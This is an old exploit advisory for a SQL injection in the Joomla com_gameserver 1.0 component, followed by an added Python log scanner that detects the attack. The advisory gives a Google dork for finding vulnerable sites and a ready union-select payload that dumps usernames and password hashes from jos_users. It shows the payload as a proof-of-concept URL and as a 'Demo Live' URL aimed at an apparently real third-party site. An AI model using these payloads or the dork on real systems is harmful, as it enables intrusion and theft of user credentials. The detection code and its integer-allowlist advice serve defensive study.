Friday, October 23, 2009

Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability

[+] Software : Game Server Component
[+] Version : 1.0
[+] Vendor : http://www.indianpulse.in/
[+] License : GPL
[+] Vulnerability : SQL Injection
[+] Google Dork : inurl:"com_gameserver"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] 999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] SQLi p0c:
[+] http://127.0.0.1/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] Demo Live:
[+] http://www.jacker.ro/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
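
[-] Detection (added example, not part of the original advisory):
[+] A log check for the request shown above: it flags any com_gameserver request whose id parameter is not a plain integer and lists the SQL keywords left after the /**/ comments are stripped. The function names, the combined access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/Nginx "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# MySQL inline comments stand in for spaces in the advisory's payload.
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/")
SQL_TOKENS_RE = re.compile(r"\b(union|select|from|group_concat|jos_users)\b", re.I)


def check_line(line):
    """Return a finding for a com_gameserver request with a non-integer id, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query)  # also percent-decodes values
    if query.get("option", [""])[0].lower() != "com_gameserver":
        return None
    for raw_id in query.get("id", []):
        if raw_id.isascii() and raw_id.isdigit():
            continue  # the only shape a legitimate id should have
        normalized = INLINE_COMMENT_RE.sub(" ", raw_id)
        tokens = sorted({t.lower() for t in SQL_TOKENS_RE.findall(normalized)})
        return {"client": line.split(" ", 1)[0], "id": raw_id, "sql_tokens": tokens}
    return None


def scan(lines):
    """Run check_line over an iterable of log lines and keep the findings."""
    return [f for f in map(check_line, lines) if f]


# Constructed sample log lines (documentation IP ranges); PAYLOAD is the string from the advisory.
PAYLOAD = ("999999/**/and/**/1=2/**/union/**/select/**/"
           "group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--")
BASE = "/index.php?option=com_gameserver&view=gamepanel&id="
SAMPLE_LOG = [
    f'192.0.2.10 - - [23/Oct/2009:10:01:02 +0000] "GET {BASE}12 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [23/Oct/2009:10:01:09 +0000] "GET {BASE}{PAYLOAD} HTTP/1.1" 200 6230',
    f'192.0.2.44 - - [23/Oct/2009:10:02:30 +0000] "GET {BASE}12abc HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Oct/2009:10:03:00 +0000] "GET /index.php?option=com_content&id=1/**/x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The integer-only test is the same allowlist the component should apply to id before it reaches the query; the keyword list only helps triage the hits.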
